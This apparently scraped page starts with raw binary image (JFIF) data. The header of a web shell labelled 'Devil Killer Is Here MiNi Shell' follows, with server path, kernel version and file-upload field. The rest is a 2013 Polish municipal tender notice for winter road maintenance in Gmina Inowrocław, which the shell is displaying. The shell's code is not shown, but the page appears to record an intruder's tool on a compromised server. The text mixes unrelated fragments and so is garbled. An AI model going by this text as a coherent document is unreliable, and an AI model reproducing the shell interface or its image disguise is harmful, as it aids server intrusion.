JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130920/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130920/192701-N-2013.html

<p class="kh_header"><b>Inowrocław: Zimowe utrzymanie dróg gminnych na terenie gminy Inowrocław
w sezonie 2013-2014</b><br>
<b>Numer ogłoszenia: 192701 - 2013; data zamieszczenia: 20.09.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Inowrocław , ul. Królowej Jadwigi 43, 88-100 Inowrocław, woj. kujawsko-pomorskie, tel. 52 3570251, faks 52 3540490.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminainowroclaw.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zimowe utrzymanie dróg gminnych na terenie gminy Inowrocław
w sezonie 2013-2014.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia polega na odśnieżaniu dróg gminnych na terenie gminy Inowrocław w celu utrzymania ich przejezdności i usuwaniu gołoledzi, poprzez posypywanie nawierzchni dróg piaskiem, w miejscach ich występowania.

Zamawiający dokonuje podziału przedmiotu zamówienia na 10 części, które odpowiadają podziałowi terenu gminy na 10 rejonów odśnieżania, w których niezależnie realizowane będzie zimowe utrzymanie dróg.
Zimowe utrzymanie jednego rejonu gminy Inowrocław tożsame jest z wykonaniem jednej części przedmiotu zamówienia. Zamawiający dopuszcza możliwość złożenia oferty na świadczenie usług w odniesieniu do jednej lub więcej części, lub całości przedmiotu zamówienia.

Wykonanie jednej części zamówienia (świadczenia usług na jednym rejonie) obejmuje świadczenie usług łącznie i nierozdzielnie, polegające na:
- odśnieżaniu dróg gminnych na terenie gminy Inowrocław w celu utrzymania ich przejezdności,
- usuwaniu gołoledzi poprzez posypywanie nawierzchni dróg piaskiem w miejscach ich występowania.

Teren gminy Inowrocław dzieli się na 10 rejonów, w których niezależnie realizowane będzie zimowe utrzymanie dróg.
Zamawiający dokonuje podziału przedmiotu zamówienia na 10 części:

Część I - zimowe utrzymanie dróg wchodzących w skład Rejonu I - obejmuje drogi leżące w obrębie miejscowości:
Batkowo, Popowice, Żalinowo, Piotrkowice, Krusza Podlotowa, Krusza Zamkowa, Krusza Duchowna, Tupadły
Długość dróg objęta odśnieżaniem: 12,096 km.


Część II - zimowe utrzymanie dróg wchodzących w skład Rejonu II - obejmuje drogi leżące w obrębie miejscowości:
Sikorowo, Jaronty, Miechowice
Długość dróg objęta odśnieżaniem: 12,445 km.


Część III - zimowe utrzymanie dróg wchodzących w skład Rejonu III - obejmuje drogi leżące w obrębie miejscowości:
Dulsk, Łojewo, Ostrowo Krzyckie, Sikorowo
Długość dróg objęta odśnieżaniem: 12,003 km.


Część IV - zimowe utrzymanie dróg wchodzących w skład Rejonu IV - obejmuje drogi leżące w obrębie miejscowości:
Dulsk, Góra Karczyn, Łąkocin, Witowy, Pławinek
Długość dróg objęta odśnieżaniem: 14,297km.


Część V - zimowe utrzymanie dróg wchodzących w skład Rejonu V - obejmuje drogi leżące w obrębie miejscowości:
Marulewy, Komaszyce, Turzany, Dziennice, Trzaski, Balczewo, Marcinkowo
Długość dróg objęta odśnieżaniem: 18,026 km.


Część VI - zimowe utrzymanie dróg wchodzących w skład Rejonu VI - obejmuje drogi leżące w obrębie miejscowości:
Marulewy, Jacewo, Olszewice, Słońsko, Balin, Latkowo
Długość dróg objęta odśnieżaniem: 15,410 km.


Część VII - zimowe utrzymanie dróg wchodzących w skład Rejonu VII - obejmuje drogi leżące w obrębie miejscowości:
Jacewo, Kłopot, Orłowo, Gnojno, Strzemkowo
Długość dróg objęta odśnieżaniem: 14,06 km.


Część VIII - zimowe utrzymanie dróg wchodzących w skład Rejonu VIII - obejmuje drogi leżące w obrębie miejscowości:
Mimowola, Cieślin, Sławęcinek, Sławęcin, Sójkowo, Kruśliwiec
Długość dróg objęta odśnieżaniem: 13,718 km.


Część IX - zimowe utrzymanie dróg wchodzących w skład Rejonu IX - obejmuje drogi leżące w obrębie miejscowości:
Pławin, Radłówek, Turlejewo, Borkowo, Jaksice (cześć zachodnia od drogi krajowej nr 25),
Długość dróg objęta odśnieżaniem: 10,006 km.


Część X - zimowe utrzymanie dróg wchodzących w skład Rejonu X - obejmuje drogi leżące w obrębie miejscowości:
Oporówek, Czyste, Jaksice (część wschodnia od drogi krajowej nr 25), Stefanowo, Jaksiczki.
Długość dróg objęta odśnieżaniem: 10,245 km.

Graficzny podział gminy Inowrocław na Rejony wraz z wykazem dróg objętych odśnieżaniem i działek został przedstawiony w formie map stanowiących załącznik nr 7 do SIWZ.

DLA KAŻDEJ CZĘŚCI USTALA SIĘ NASTĘPUJĄCE WARUNKI:
2. Do obowiązków wykonawcy będzie należało:

-  utrzymanie pełnej gotowości sprzętu i ludzi 24 godz. na dobę;
- zapewnienie łączności telefonicznej przez całą dobę - telefon stacjonarny i lub komórkowy;
- zapewnienie, przygotowanie i utrzymanie niezbędnego zapasu piasku we własnym zakresie;
- przygotowanie specjalistycznego sprzętu drogowego - szczególnie do odśnieżania i likwidacji śliskości. Sprzęt powinien być przygotowany w takim stopniu, aby mógł być gotowy do użycia w ciągu 1 godziny od chwili powzięcia decyzji o konieczności podjęcia akcji na drogach. Sprzęt musi być sprawny technicznie i dopuszczony do ruchu zgodnie z obowiązującymi przepisami;
- świadczenie usług w przypadku wystąpienia opadów śniegu (odśnieżanie dróg gminnych) lub konieczności likwidacji śliskości zimowej i pośniegowej.

Do przedmiotu zamówienia należy również odśnieżanie przystanków zlokalizowanych przy drogach zlokalizowanych na terenie Gminy Inowrocław, wchodzących w skład konkretnego rejonu, po wcześniejszym zgłoszeniu potrzeby wykonania danej czynności przez Zamawiającego.
 
3. Bezpośredni nadzór nad prawidłowym przebiegiem wykonanych prac powierza się pracownikom Urzędu Gminy Inowrocław. Wykonawca każdego dnia, w którym podjął pracę będącą przedmiotem zamówienia, zobowiązany jest do poinformowania o fakcie zakończenia zadania. 

4. Wykonawca jest zobowiązany do ochrony przez uszkodzeniami lub zniszczeniem własności prywatnej i publicznej. Jeżeli w związku z niewłaściwym prowadzeniem robót, zaniedbaniem lub brakiem działań ze strony Wykonawcy nastąpi uszkodzenie lub zniszczenie własności prywatnej lub publicznej, to Wykonawca na swój koszt naprawi lub odtworzy uszkodzoną własność w taki sposób, aby stan naprawionej własności był nie gorszy niż przed powstaniem tego uszkodzenia lub zniszczenia.  
5. Drogi będące w zarządzie gminy Inowrocław zostały sklasyfikowane w standardach: V, VI i VII zimowego utrzymania dróg. 
6. Poprzez zgłoszenie wykonania danej usługi Zamawiający rozumie przekazanie określonemu Wykonawcy informacji o potrzebie wykonania usługi przez uprawnionego przedstawiciela Zamawiającego.

Standard V - wymaga się, aby jezdnia była odśnieżona w stopniu zapewniającym komunikację, a w miejscach występowania zasp odśnieżony co najmniej jeden pas ruchu z wykonaniem mijanek. Na jezdni może występować zajeżdżony śnieg lub nabój śnieżny. Śnieg luźny będzie usunięty z jezdni w czasie do 6 godzin po ustaniu opadów śniegu. Zaspy należy usunąć z jezdni w czasie do 12 godzin po ustaniu opadów śniegu. 
Drogi w standardzie V, na których kursuje komunikacja gminna muszą zostać odśnieżone do godziny 7:00. Jeżeli w danym dniu nastąpi konieczność ponownego odśnieżenia lub/i zwalczania śliskości zimowej i pośniegowej drogi, prace te będą miały charakter interwencyjny (rozpoczęcie prac ustala się najpóźniej w ciągu 1 godziny od zgłoszenia). 
Gołoledź lub gołoledź pośniegową, która wystąpi na drogach o standardzie V i VI należy zlikwidować w czasie do 6 godzin od zgłoszenia wykonania usługi.

Standard VI - odśnieżanie prowadzi się interwencyjnie, w zależności od potrzeb, jezdnia posypywana i odśnieżana w miejscach wyznaczonych przez Zarządcę drogi. Rozpoczęcie prac ustala się najpóźniej w ciągu 1 godziny od zgłoszenia.

Standard VII - droga nie objęta zimowym utrzymaniem.

6. Wykonawca chcący złożyć ofertę musi dysponować odpowiednim potencjałem technicznym umożliwiającym wykonanie zadania. 

W przypadku składania oferty na jedno zadanie (odśnieżanie jednego z rejonów gminy Inowrocław przedstawionych w załączniku Nr 7 do SIWZ) wykonawca musi dysponować następującym sprzętem:
- samochód ciężarowy lub ciągnik o ładowności 10 - 15 Mg  		- 1 szt. minimum
- piaskarka									- 1 szt. minimum
- pług lemieszowy z nakładką z gumy lub tworzywa sztucznego		- 1 szt. minimum
- ładowarka 									- 1 szt. minimum	
- pług wirnikowy 								- 1 szt. Minimum

W przypadku składania oferty na dwa zadania (odśnieżanie dwóch rejonów gminy Inowrocław przedstawionych w załączniku Nr 7 do SIWZ) wykonawca musi dysponować następującym sprzętem:
- samochód ciężarowy lub ciągnik o ładowności 10 - 15 Mg  		- 1 szt. minimum
- piaskarka 									- 1 szt. minimum
- pług lemieszowy z nakładką z gumy lub tworzywa sztucznego		- 2 szt. minimum
- ładowarka 									- 1 szt. minimum
- pług wirnikowy 								- 1 szt. minimum

W przypadku składania oferty na trzy zadania (odśnieżanie trzech rejonów gminy Inowrocław przedstawionych w załączniku Nr 7 do SIWZ) wykonawca musi dysponować następującym sprzętem:
- samochód ciężarowy lub ciągnik o ładowności 10 - 15 Mg  		- 2 szt. minimum
- piaskarka 									- 2 szt. minimum
- pług lemieszowy z nakładką z gumy lub tworzywa sztucznego		- 3 szt. minimum
- ładowarka 									- 1 szt. minimum
- pług wirnikowy 								- 1 szt. minimum

W przypadku składania oferty na cztery zadania (odśnieżanie czterech rejonów gminy Inowrocław przedstawionych w załączniku Nr 7 do SIWZ) wykonawca musi dysponować następującym sprzętem:
- samochód ciężarowy lub ciągnik o ładowności 10 - 15 Mg  		- 2 szt. minimum
- piaskarka 									- 2 szt. minimum
- pług lemieszowy z nakładką z gumy lub tworzywa sztucznego		- 4 szt. minimum
- ładowarka 									- 1 szt. minimum
- pług wirnikowy 								- 1 szt. minimum

* W przypadku gdy wykonawca nie posiada któregokolwiek z wymienionego sprzętu, konieczne jest przedstawienie umowy użyczenia sprzętu na okres obejmowania umową tj. do 30.04.2014r. przed podpisaniem umowy.

W przypadku składnia ofert na więcej niż cztery zadania należy dysponować sprzętem w ilości wzrastającej proporcjonalnie do ilości odśnieżanych rejonów gminy Inowrocław. Sprzęt wykorzystywany do odśnieżania musi posiadać dodatkowe światła drogowe umożliwiające pracę w warunkach ograniczonej widoczności, światła ostrzegawcze pulsujące barwy pomarańczowej oraz światła gabarytowe.

UWAGA
Ciągniki wykorzystywane przy realizacji zamówienia muszą zostać wyposażone w pługi lemieszowe zakończone w dolnej części nakładkami z gumy lub tworzyw sztucznych. 
Zamawiający nie dopuszcza możliwości stosowania lemieszy stalowych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 10.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest najpóźniej do wyznaczonego terminu składania ofert, tj. do dnia 1 października 2013 r. do godz. 10.00 wnieść wadium w wysokości  280,- zł*. (słownie: dwieście osiemdziesiąt złotych).
Wadium w kwocie 280,- zł dotyczy złożenia oferty dotyczącej jednego rejonu. W przypadku składania oferty na więcej niż jeden rejon odśnieżania, Wykonawca zobowiązany jest pomnożyć kwotę przez ilość rejonów na które składa ofertę.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, Zamawiający uzna, że wykonawca spełnia warunek udziału w postępowaniu na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, stanowiącego Załącznik nr 2a do SIWZ.

Ocena spełniania warunku będzie dokonana wg formuły: spełnia - nie spełnia w oparciu o załączone do oferty dokumenty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku posiadania wiedzy i doświadczenia, Zamawiający dokona oceny spełniania warunków udziału w postępowaniu w tym zakresie, na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, stanowiącego  Załącznik nr 2a do SIWZ;

Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał z należytą starannością minimum 1 usługę świadczoną przy zimowym utrzymaniu dróg w minimum jednym sezonie zimowym o wielkości porównywalnej
z przedmiotem zamówienia z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem poświadczenia potwierdzającego, że roboty zostały wykonane poprawnie i prawidłowo ukończone - załącznik nr 3 do SIWZ.

Uwaga:
a)	Wykaz należy sporządzić na druku zgodnie ze wzorem stanowiącym ZAŁĄCZNIK NR 3 do SIWZ - WYKAZ USŁUG ZWIĄZANYCH Z ZIMOWYM UTRZYMANIEM DRÓG-.
b)	W przedmiocie wykazywanych usług należy wskazać czy zadanie polegało na wykonywaniu usług odpowiadających swoim charakterem użytkowym przedmiotowi zamówienia,
c)	Dla usług wymienionych w wykazie należy załączyć dokumenty potwierdzające, że zostały one wykonane należycie.
d)	Wartości podane w walutach innych niż wskazane przez Zamawiającego należy przeliczyć wg średniego kursu NBP na dzień zakończenia realizacji usług projektowych, podając datę i kurs.
e)	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunku określonego w pkt V SIWZ.
f)	 Wykonawca, który polega na zasobach innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

Ocena spełniania warunku będzie dokonana wg formuły: spełnia - nie spełnia w oparciu o załączone do oferty oświadczenie i dokumenty.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku dysponowania odpowiednim potencjałem technicznym Wykonawca złoży oświadczenie o spełnianiu warunków, stanowiące Załącznik nr 2a do SIWZ,  a także oświadczenie stanowiące Załącznik nr 4 do SIWZ.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymieniony dokument - załącznik nr 4 do SIWZ - Wykonawcy składają wspólnie.
Ocena spełniania warunku będzie dokonana wg formuły: spełnia - nie spełnia w oparciu o załączone do oferty dokumenty.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku dysponowania osobami, zdolnymi do wykonania zamówienia, Wykonawca złoży oświadczenie o spełnianiu warunków, stanowiące Załącznik nr 2a do SIWZ.

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wyżej wymieniony dokument Wykonawcy składają wspólnie.
Wykonawca, który polega na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

Ocena spełniania warunku będzie dokonana wg formuły: spełnia - nie spełnia w oparciu o załączone do oferty oświadczenie i dokumenty.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie spełniania warunku znajdowania się sytuacji ekonomicznej i finansowej, umożliwiającej realizację zamówienia, Wykonawca złoży oświadczenie o znajdowaniu się w sytuacji ekonomicznej i finansowej, umożliwiającej realizację przedmiotu zamówienia, stanowiące Załącznik nr 2a do  SIWZ.

Dodatkowo Wykonawca złoży opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 
50 000 PLN.
Ocena spełniania warunku będzie dokonana wg formuły: spełnia - nie spełnia w oparciu o załączone do oferty oświadczenie i dokumenty.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał z należytą starannością minimum 1 usługę świadczoną przy zimowym utrzymaniu dróg w minimum jednym sezonie zimowym o wielkości porównywalnej z przedmiotem zamówienia z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem poświadczenia potwierdzającego, że roboty zostały wykonane poprawnie i prawidłowo ukończone - załącznik nr 3 do SIWZ.;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

